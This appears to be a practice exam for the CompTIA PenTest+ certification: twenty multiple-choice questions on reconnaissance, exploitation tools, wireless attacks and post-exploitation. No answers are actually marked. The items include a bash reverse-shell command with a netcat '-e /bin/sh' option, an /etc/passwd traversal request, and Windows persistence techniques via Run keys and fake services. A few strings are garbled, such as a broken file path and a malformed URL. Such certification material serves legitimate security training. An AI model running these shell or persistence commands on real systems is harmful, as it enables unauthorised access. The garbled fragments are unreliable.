Question 1

During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?

Accepted Answer

A)  Locating emergency exits 
B)  Preparing a pretext 
C)  Shoulder surfing the victim 
D)  Tailgating the victim

Question 2

Which of the following commands starts the Metasploit database?

Accepted Answer

A)  msfconsole 
B)  workspace 
C)  msfvenom 
D)  db_init 
E)  db_connect

Question 3

A penetration tester is performing a black-box test of a client web application, and the scan host is unable to access it. The client has sent screenshots showing the system is functioning correctly. Which of the following is MOST likely the issue?

Accepted Answer

A)  The penetration tester was not provided with a WSDL file. 
B)  The penetration tester needs an OAuth bearer token. 
C)  The tester has provided an incorrect password for the application. 
D)  An IPS/WAF whitelist is in place to protect the environment.

Question 4

A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)

Accepted Answer

A)  Wait outside of the company's building and attempt to tailgate behind an employee. 
B)  Perform a vulnerability scan against the company's external netblock, identify exploitable vulnerabilities, and attempt to gain access. 
C)  Use domain and IP registry websites to identify the company's external netblocks and external facing applications. 
D)  Search social media for information technology employees who post information about the technologies they work with. 
E)  Identify the company's external facing webmail application, enumerate user accounts and attempt password guessing to gain access.

Question 5

A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for penetration?

Accepted Answer

A)  Obtain staff information by calling the company and using social engineering techniques. 
B)  Visit the client and use impersonation to obtain information from staff. 
C)  Send spoofed emails to staff to see if staff will respond with sensitive information. 
D)  Search the internet for information on staff such as social networking sites.

Question 6

A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0> &1 Which of the following additional commands would need to be executed on the tester's Linux system to make the previous command successful?

Accepted Answer

A)  nc -nlvp 443 
B)  nc 10.2.4.6. 443 
C)  nc -w3 10.2.4.6 443 
D)  nc -e /bin/sh 10.2.4.6. 443

Question 7

An organization has requested that a penetration test be performed to determine if it is possible for an attacker to gain a foothold on the organization's server segment. During the assessment, the penetration tester identifies tools that appear to have been left behind by a prior attack. Which of the following actions should the penetration tester take?

Accepted Answer

A)  Attempt to use the remnant tools to achieve persistence. 
B)  Document the presence of the left-behind tools in the report and proceed with the test. 
C)  Remove the tools from the affected systems before continuing on with the test. 
D)  Discontinue further testing and report the situation to management.

Question 8

A penetration tester is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network. The tester is monitoring the correct channel for the identified network, but has been unsuccessful in capturing a handshake. Given the scenario, which of the following attacks would BEST assist the tester in obtaining this handshake?

Accepted Answer

A)  Karma attack 
B)  Deauthentication attack 
C)  Fragmentation attack 
D)  SSDI broadcast flood

Question 9

Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?

Accepted Answer

A)  Stack pointer register 
B)  Index pointer register 
C)  Stack base pointer 
D)  Destination index register

Question 10

A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?

Accepted Answer

A)  arpspoof 
B)  nmap 
C)  responder 
D)  burpsuite

Question 11

A penetration tester has been asked to conduct OS fingering with Nmap using a company-provided text file that contains a list of IP addresses. Which of the following are needed to conduct this scan? (Choose two.)

Accepted Answer

A)  -O 
B)  -iL 
C)  -sV 
D)  -sS 
E)  -oN
F) -oX

Question 12

A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).

Accepted Answer

A)  Convert to JAR. 
B)  Decompile. 
C)  Cross-compile the application. 
D)  Convert JAR files to DEX. 
E)  Re-sign the APK.
F) Attach to ADB.

Question 13

An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email in hopes the Chief Executive Officer (CEO) logs in to obtain the CEO's login credentials.

Accepted Answer

A)  Elicitation attack 
B)  Impersonation attack 
C)  Spear phishing attack 
D)  Drive-by download attack

Question 14

Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?

Accepted Answer

A)  LSASS 
B)  SAM database 
C)  Active Directory 
D)  Registry

Question 15

When performing compliance-based assessments, which of the following is the MOST important key consideration?

Accepted Answer

A)  Additional rate 
B)  Company policy 
C)  Impact tolerance 
D)  Industry type

Question 16

An attacker performed a MITM attack against a mobile application. The attacker is attempting to manipulate the application's network traffic via a proxy tool. The attacker only sees limited traffic as cleartext. The application log files indicate secure SSL/TLS connections are failing. Which of the following is MOST likely preventing proxying of all traffic?

Accepted Answer

A)  Misconfigured routes 
B)  Certificate pinning 
C)  Strong cipher suites 
D)  Closed ports

Question 17

A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL: http:www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswd Which of the following attack types is MOST likely to be the vulnerability?

Accepted Answer

A)  Directory traversal 
B)  Cross-site scripting 
C)  Remote file inclusion 
D)  User enumeration

Question 18

A penetration tester has performed a pivot to a new Linux device on a different network. The tester writes the following command: for m in {1..254..1};do ping -c 1 192.168.101.$m; done Which of the following BEST describes the result of running this command?

Accepted Answer

A)  Port scan 
B)  Service enumeration 
C)  Live host identification 
D)  Denial of service

Question 19

In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?

Accepted Answer

A)  Common libraries 
B)  Configuration files 
C)  Sandbox escape 
D)  ASLR bypass

Question 20

A penetration tester has gained access to a marketing employee's device. The penetration tester wants to ensure that if the access is discovered, control of the device can be regained. Which of the following actions should the penetration tester use to maintain persistence to the device? (Select TWO.)

Accepted Answer

A)  Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1. 
B)  Place an entry in C:\windows\system32\drivers\etc\hosts for 12.17.20.10 badcomptia.com. 
C)  Place a script in C:\users\%username\local\appdataoaming	emp\au57d.ps1. 
D)  Create a fake service in Windows called RTAudio to execute manually. 
E)  Place an entry for RTAudio in HKLM\CurrentControlSet\Services\RTAudio.
F) Create a schedule task to call C:\windows\system32\drivers\etc\hosts.

Exam 12: CompTIA PenTest+ Certification Exam